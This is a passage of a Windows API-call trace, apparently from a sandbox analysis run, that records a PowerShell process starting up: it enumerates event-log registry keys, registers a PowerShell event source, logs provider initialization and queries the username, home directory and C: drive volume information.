	[0429.647] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x350) returned 0x0
	[0429.647] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.647] RegOpenKeyExW (in: hKey=0x314, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x354) returned 0x0
	[0429.647] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.647] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x358) returned 0x0
	[0429.648] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.648] RegOpenKeyExW (in: hKey=0x314, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x35c) returned 0x0
	[0429.648] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.648] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x360) returned 0x0
	[0429.648] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x364) returned 0x0
	[0429.648] RegCloseKey (hKey=0x364) returned 0x0
	[0429.648] RegCloseKey (hKey=0x314) returned 0x0
	[0429.648] RegCloseKey (hKey=0x360) returned 0x0
	[0429.649] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d618 | out: phkResult=0x18d618*=0x360) returned 0x0
	[0429.649] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d58c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d588, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d58c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d588*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.650] CoTaskMemFree (pv=0x0) 
	[0429.650] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.650] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.650] CoTaskMemFree (pv=0x22c760) 
	[0429.650] CoTaskMemFree (pv=0x0) 
	[0429.650] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.650] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.650] CoTaskMemFree (pv=0x22c760) 
	[0429.650] CoTaskMemFree (pv=0x0) 
	[0429.650] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.650] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.650] CoTaskMemFree (pv=0x22c760) 
	[0429.650] CoTaskMemFree (pv=0x0) 
	[0429.650] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.650] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.650] CoTaskMemFree (pv=0x22c760) 
	[0429.650] CoTaskMemFree (pv=0x0) 
	[0429.650] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.650] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.650] CoTaskMemFree (pv=0x22c760) 
	[0429.650] CoTaskMemFree (pv=0x0) 
	[0429.650] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.650] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.651] CoTaskMemFree (pv=0x22c760) 
	[0429.651] CoTaskMemFree (pv=0x0) 
	[0429.651] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.651] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.651] CoTaskMemFree (pv=0x22c760) 
	[0429.651] CoTaskMemFree (pv=0x0) 
	[0429.651] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.651] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.651] CoTaskMemFree (pv=0x22c760) 
	[0429.651] CoTaskMemFree (pv=0x0) 
	[0429.651] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.651] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x22c760, lpcchName=0x18d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.651] CoTaskMemFree (pv=0x22c760) 
	[0429.651] CoTaskMemFree (pv=0x0) 
	[0429.651] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x314) returned 0x0
	[0429.651] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x0) returned 0x2
	[0429.651] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x364) returned 0x0
	[0429.651] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x0) returned 0x2
	[0429.651] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x368) returned 0x0
	[0429.652] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x0) returned 0x2
	[0429.652] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x36c) returned 0x0
	[0429.652] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x0) returned 0x2
	[0429.652] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x370) returned 0x0
	[0429.652] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x0) returned 0x2
	[0429.652] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x374) returned 0x0
	[0429.652] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x0) returned 0x2
	[0429.652] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x378) returned 0x0
	[0429.652] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x0) returned 0x2
	[0429.652] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x37c) returned 0x0
	[0429.652] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x0) returned 0x2
	[0429.653] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x380) returned 0x0
	[0429.653] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d678 | out: phkResult=0x18d678*=0x384) returned 0x0
	[0429.653] RegCloseKey (hKey=0x384) returned 0x0
	[0429.653] RegCloseKey (hKey=0x360) returned 0x0
	[0429.653] RegCloseKey (hKey=0x380) returned 0x0
	[0429.754] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b960008
	[0429.848] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e2bd68*="WSMan", lpRawData=0x2e2bad8) returned 1
	[0429.849] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0429.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.849] CoTaskMemFree (pv=0x290510) 
	[0429.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.851] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0429.851] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d908) returned 0x1
	[0429.852] CoTaskMemFree (pv=0x1b35c010) 
	[0429.852] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.852] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d948) returned 1
	[0429.852] CoTaskMemFree (pv=0x22c760) 
	[0429.852] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e31748*="Alias", lpRawData=0x2e314d8) returned 1
	[0429.854] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0429.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.854] CoTaskMemFree (pv=0x290510) 
	[0429.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.856] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0429.856] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d908) returned 0x1
	[0429.856] CoTaskMemFree (pv=0x1b35c010) 
	[0429.856] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.856] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d948) returned 1
	[0429.856] CoTaskMemFree (pv=0x22c760) 
	[0429.857] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e36d40*="Environment", lpRawData=0x2e36ad0) returned 1
	[0429.858] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0429.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.858] CoTaskMemFree (pv=0x290510) 
	[0429.859] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0429.859] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0429.859] CoTaskMemFree (pv=0x290510) 
	[0429.859] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0429.859] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0429.859] CoTaskMemFree (pv=0x290510) 
	[0429.860] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x18d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0429.860] SetErrorMode (uMode=0x1) returned 0x1
	[0429.860] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x18d6c0 | out: lpFileInformation=0x18d6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0429.860] SetErrorMode (uMode=0x1) returned 0x1
	[0429.861] GetLogicalDrives () returned 0x4
	[0429.861] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18d220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0429.862] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0429.862] SetErrorMode (uMode=0x1) returned 0x1
	[0429.862] CoTaskMemAlloc (cb=0x68) returned 0x2a5c50
	[0429.862] CoTaskMemAlloc (cb=0x68) returned 0x2a5be0
	[0429.862] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2a5c50, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x18d690, lpMaximumComponentLength=0x18d68c, lpFileSystemFlags=0x18d688, lpFileSystemNameBuffer=0x2a5be0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18d690*=0x9c354b42, lpMaximumComponentLength=0x18d68c*=0xff, lpFileSystemFlags=0x18d688*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0429.863] CoTaskMemFree (pv=0x2a5c50) 
	[0429.863] CoTaskMemFree (pv=0x2a5be0) 
	[0429.863] SetErrorMode (uMode=0x1) returned 0x1
	[0429.863] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0429.863] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0429.863] SetErrorMode (uMode=0x1) returned 0x1
	[0429.863] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d630 | out: lpFileInformation=0x18d630*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0429.864] SetErrorMode (uMode=0x1) returned 0x1
	[0429.864] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0429.864] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18d280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0429.864] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0429.864] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0429.864] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0429.865] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0429.865] SetErrorMode (uMode=0x1) returned 0x1
	[0429.865] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d460 | out: lpFileInformation=0x18d460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0429.865] SetErrorMode (uMode=0x1) returned 0x1
	[0429.865] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0429.866] SetErrorMode (uMode=0x1) returned 0x1
	[0429.866] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d460 | out: lpFileInformation=0x18d460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0429.866] SetErrorMode (uMode=0x1) returned 0x1
	[0429.866] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0429.866] SetErrorMode (uMode=0x1) returned 0x1
	[0429.866] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d500 | out: lpFileInformation=0x18d500*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0429.866] SetErrorMode (uMode=0x1) returned 0x1
	[0429.866] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0429.866] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d908) returned 0x1
	[0429.867] CoTaskMemFree (pv=0x1b35c010) 
	[0429.867] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.867] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d948) returned 1
	[0429.867] CoTaskMemFree (pv=0x22c760) 
	[0429.868] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e3de30*="FileSystem", lpRawData=0x2e3dbc0) returned 1
	[0429.869] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0429.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.869] CoTaskMemFree (pv=0x290510) 
	[0429.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.871] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0429.871] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d908) returned 0x1
	[0429.871] CoTaskMemFree (pv=0x1b35c010) 
	[0429.871] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.871] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d948) returned 1
	[0429.871] CoTaskMemFree (pv=0x22c760) 
	[0429.872] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e43670*="Function", lpRawData=0x2e43400) returned 1
	[0429.875] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0429.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.875] CoTaskMemFree (pv=0x290510) 
	[0429.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
